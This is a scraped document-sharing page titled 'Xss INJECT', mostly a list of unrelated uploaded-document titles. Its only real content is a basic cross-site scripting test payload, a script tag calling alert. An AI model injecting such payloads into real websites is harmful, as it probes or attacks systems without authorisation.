IIS 5.1 Directory Authentication Bypass: Soroush Dalili
3 pages
AddonsTutorial 1 6 PDF
No ratings yet
AddonsTutorial 1 6 PDF
56 pages
AddonsTutorial 1 6 PDF
No ratings yet
AddonsTutorial 1 6 PDF
56 pages
Azure Fundamentals
100% (1)
Azure Fundamentals
59 pages
OSCP Vulnhub Hackthebox
No ratings yet
OSCP Vulnhub Hackthebox
3 pages
Sample DRDIS
No ratings yet
Sample DRDIS
34 pages
ITsec Router Audit Checklist
No ratings yet
ITsec Router Audit Checklist
4 pages
Oracle Iplanet Web Server PDF
No ratings yet
Oracle Iplanet Web Server PDF
1 page
Oracle Iplanet Web Server PDF
No ratings yet
Oracle Iplanet Web Server PDF
1 page
Yulian Sani - Security Assessment Crackme - Cenzic
No ratings yet
Yulian Sani - Security Assessment Crackme - Cenzic
37 pages
CND PDF
No ratings yet
CND PDF
1 page
Fatal Error: Call To A Member Function Savehtml On A Non-Object in C:/Xampp/Htdocs/Merge/Index - PHP On Line 30
No ratings yet
Fatal Error: Call To A Member Function Savehtml On A Non-Object in C:/Xampp/Htdocs/Merge/Index - PHP On Line 30
1 page
Owasp Payload
No ratings yet
Owasp Payload
852 pages
BH Win 03 Burnett
No ratings yet
BH Win 03 Burnett
25 pages
Jquery Easyui
No ratings yet
Jquery Easyui
125 pages
List Exchange Crypto
No ratings yet
List Exchange Crypto
18 pages
Extabit Cookies
No ratings yet
Extabit Cookies
7 pages
OpTransactionHistory05 01 2024
No ratings yet
OpTransactionHistory05 01 2024
24 pages
Account Statement: August 2024
No ratings yet
Account Statement: August 2024
10 pages
AccountStatement - 15-11-2024 12 - 15 - 04
No ratings yet
AccountStatement - 15-11-2024 12 - 15 - 04
327 pages
SEO Services Delhi
No ratings yet
SEO Services Delhi
3 pages
Statement
No ratings yet
Statement
15 pages
2018 CPM-done-withmock PDF
No ratings yet
2018 CPM-done-withmock PDF
38 pages
Scribd Premium Cookie
No ratings yet
Scribd Premium Cookie
6 pages
Statement MAY2018 098010526-1
No ratings yet
Statement MAY2018 098010526-1
11 pages
Internship Report PPT
No ratings yet
Internship Report PPT
15 pages
Damaged-Car-Removal Serp Au 2022-06-13
No ratings yet
Damaged-Car-Removal Serp Au 2022-06-13
4 pages
Daniel Batalla Queirolo at Nexton
No ratings yet
Daniel Batalla Queirolo at Nexton
7 pages
Tekstong Naratibo o Nagsasalaysay - PDF
No ratings yet
Tekstong Naratibo o Nagsasalaysay - PDF
13 pages
AccountStatement - 30-05-2025 125141
No ratings yet
AccountStatement - 30-05-2025 125141
152 pages
Migrasi Ke E-Commerce: Onno W. Purbo
No ratings yet
Migrasi Ke E-Commerce: Onno W. Purbo
48 pages
关于作业的辩论
100% (1)
关于作业的辩论
8 pages
2025 19 1 15 29 51 PayLater - Statement - 1737280791287
No ratings yet
2025 19 1 15 29 51 PayLater - Statement - 1737280791287
19 pages
V 6109629839424099312
No ratings yet
V 6109629839424099312
11 pages
Calling DataBase (Brands) TEDx
No ratings yet
Calling DataBase (Brands) TEDx
7 pages
Affiliate Marketing
No ratings yet
Affiliate Marketing
46 pages
Benefits of E-Payment SystemNEW
No ratings yet
Benefits of E-Payment SystemNEW
43 pages
Gravity Falls
No ratings yet
Gravity Falls
3 pages
Statement 194801000020579
No ratings yet
Statement 194801000020579
11 pages
Seo For Sme - List - 2021 10 19
No ratings yet
Seo For Sme - List - 2021 10 19
15 pages
PDF Makalah Grand Theory Pendidikan - Compress
No ratings yet
PDF Makalah Grand Theory Pendidikan - Compress
14 pages
Tiktok Shop
No ratings yet
Tiktok Shop
5 pages
NiyoX-Statement-Yaram Soujanya-01Jan23 To 31jan23 Qvflhney
No ratings yet
NiyoX-Statement-Yaram Soujanya-01Jan23 To 31jan23 Qvflhney
11 pages
Js Final
No ratings yet
Js Final
4 pages

Xss INJECT

Uploaded by

Xss INJECT

Uploaded by

<script>alert(123);</script>

You might also like